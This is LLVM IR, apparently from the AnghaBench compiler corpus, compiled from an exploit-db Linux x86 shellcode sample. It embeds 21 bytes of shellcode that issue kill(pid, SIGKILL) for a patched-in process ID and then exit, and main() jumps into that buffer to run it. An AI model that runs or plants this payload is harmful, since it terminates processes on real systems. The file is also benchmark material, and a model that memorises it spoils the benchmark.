; ModuleID = '/home/carl/AnghaBench/exploitdb/shellcodes/linux_x86/extr_44990.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/shellcodes/linux_x86/extr_44990.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@__const.main.shellcode = private unnamed_addr constant [21 x i8] c"1\C0\B0%\89\C3\89\C1f\BB\F1\0A\B1\09\CD\80\B0\01\CD\80\00", align 16
@.str = private unnamed_addr constant [22 x i8] c"Shellcode length: %d\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main() #0 {
  %1 = alloca i16, align 2
  %2 = alloca [21 x i8], align 16
  %3 = alloca i32 (...)*, align 8
  store i16 2801, i16* %1, align 2
  %4 = bitcast [21 x i8]* %2 to i8*
  call void @llvm.memcpy.p0i8.p0i8.i64(i8* align 16 %4, i8* align 16 getelementptr inbounds ([21 x i8], [21 x i8]* @__const.main.shellcode, i32 0, i32 0), i64 21, i1 false)
  %5 = load i16, i16* %1, align 2
  %6 = zext i16 %5 to i32
  %7 = and i32 %6, 255
  %8 = trunc i32 %7 to i8
  %9 = getelementptr inbounds [21 x i8], [21 x i8]* %2, i64 0, i64 10
  store i8 %8, i8* %9, align 2
  %10 = load i16, i16* %1, align 2
  %11 = zext i16 %10 to i32
  %12 = ashr i32 %11, 8
  %13 = and i32 %12, 255
  %14 = trunc i32 %13 to i8
  %15 = getelementptr inbounds [21 x i8], [21 x i8]* %2, i64 0, i64 11
  store i8 %14, i8* %15, align 1
  %16 = getelementptr inbounds [21 x i8], [21 x i8]* %2, i64 0, i64 0
  %17 = call i32 @strlen(i8* %16)
  %18 = call i32 @printf(i8* getelementptr inbounds ([22 x i8], [22 x i8]* @.str, i64 0, i64 0), i32 %17)
  %19 = getelementptr inbounds [21 x i8], [21 x i8]* %2, i64 0, i64 0
  %20 = bitcast i8* %19 to i32 (...)*
  store i32 (...)* %20, i32 (...)** %3, align 8
  %21 = load i32 (...)*, i32 (...)** %3, align 8
  %22 = call i32 (...) %21()
  ret i32 0
}

; Function Attrs: argmemonly nounwind willreturn
declare void @llvm.memcpy.p0i8.p0i8.i64(i8* noalias nocapture writeonly, i8* noalias nocapture readonly, i64, i1 immarg) #1

declare dso_local i32 @printf(i8*, i32) #2

declare dso_local i32 @strlen(i8*) #2


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
